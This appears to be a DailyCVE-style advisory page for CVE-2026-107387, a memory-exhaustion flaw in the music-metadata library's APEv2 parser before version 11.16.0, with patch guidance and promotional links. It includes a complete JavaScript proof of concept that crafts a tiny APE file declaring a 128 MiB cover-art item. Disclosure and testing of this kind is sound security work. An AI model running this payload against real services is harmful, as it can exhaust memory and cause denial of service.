music-metadata, Uncontrolled Memory Allocation, CVE-2026-107387 (Medium) -DC-Oct2026-2958

Listen to this Post

The CVE-2026-107387 vulnerability affects the music-metadata library prior to version 11.16.0, specifically residing within its APEv2 parser implementation across `APEv2Token.ts` and APEv2Parser.ts.
The core flaw stems from improper input validation and uncontrolled memory allocation during the processing of APEv2 tags.
When parsing an input file containing an APEv2 tag item, the parser reads an attacker-controlled size value directly from the tag item header using an unsigned 32-bit little-endian integer read operation.
Instead of validating whether the declared size fits within the remaining bytes of the input file or tag data, the parser immediately trusts this value and allocates a massive `Uint8Array` buffer for binary items, such as embedded cover art.
An attacker can craft a malicious, highly compact `.ape` file containing a small physical payload size while declaring an extremely large binary item size in the header.
When the parser attempts to read this item, it triggers an immediate, disproportionate memory allocation before ever confirming the data’s existence.
Repeated or concurrent parsing requests of such crafted inputs can rapidly exhaust the host process’s available memory, resulting in a denial of service via memory exhaustion.
The issue is strictly confined to resource availability, as no confidentiality or integrity breaches occur, but it completely disrupts normal operations for applications relying on untrusted file parsing.

DailyCVE Form:

Platform: music-metadata
Version: 11.15.0
Vulnerability: Uncontrolled Memory Allocation
Severity: Medium
date: October 8, 2026

Prediction: Already patched today

What Undercode Say:

To replicate or examine this issue during debugging or testing, developers can use the standard Node.js environment setup and run the provided proof-of-concept script with garbage collection exposed via command line options.

Bash commands for setup and testing:

npm install --ignore-scripts
npm run compile-src:dev
node --expose-gc poc-apev2-memory.mjs

Exploit: (Educational Purposes!)

The proof-of-concept payload demonstrates how a tiny file can force a massive memory reservation:

import { parseBuffer } from './lib/core.js';
const le16 = n => Uint8Array.from([n & 255, n >>> 8]);
const le32 = n => Uint8Array.from([n & 255, n >>> 8 & 255, n >>> 16 & 255, n >>> 24]);
const cat = (...parts) => {
const out = new Uint8Array(parts.reduce((n, p) => n + p.length, 0));
let off = 0;
for (const p of parts) out.set(p, off), off += p.length;
return out;
};
const big = 0x08000000; // 128 MiB
const desc = cat(
Buffer.from('MAC '), le32(4000), le32(52), le32(24),
le32(0), le32(0), le32(0), le32(0), le32(0), new Uint8Array(16)
);
const hdr = cat(
le16(0), le16(0), le32(1), le32(1), le32(1),
le16(16), le16(1), le32(44100)
);
const key = Buffer.from('Cover Art (Front)\0', 'ascii');
const item = cat(le32(big), le32(2));
const tag = cat(
Buffer.from('APETAGEX'),
le32(2000),
le32(32 + item.length + key.length + big),
le32(1),
le32(0),
new Uint8Array(8)
);
const payload = cat(desc, hdr, tag, item, key);
if (global.gc) global.gc();
const before = process.memoryUsage();
try {
await parseBuffer(payload, { mimeType: 'audio/ape' });
} catch (error) {
console.log(error.constructor.name + ': ' + error.message);
}
const after = process.memoryUsage();
console.log('input bytes:', payload.byteLength);
console.log('arrayBuffers delta MB:', ((after.arrayBuffers - before.arrayBuffers) / 1024 / 1024).toFixed(2));

Protection: from this CVE

To secure applications against this vulnerability, upgrade the `music-metadata` package to version 11.16.0 or higher. The updated parser implements strict validation logic for `tagItemHeader.size` prior to any memory allocation, rejecting malformed tag item sizes that exceed the remaining file bounds or reasonable size limits.

Impact:

An application parsing untrusted audio files is susceptible to a denial of service via memory exhaustion. While the payload itself is minuscule, it induces large memory allocations per parse operation, which can easily compound under concurrent or repeated execution flows, leading to crashes or unavailability.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top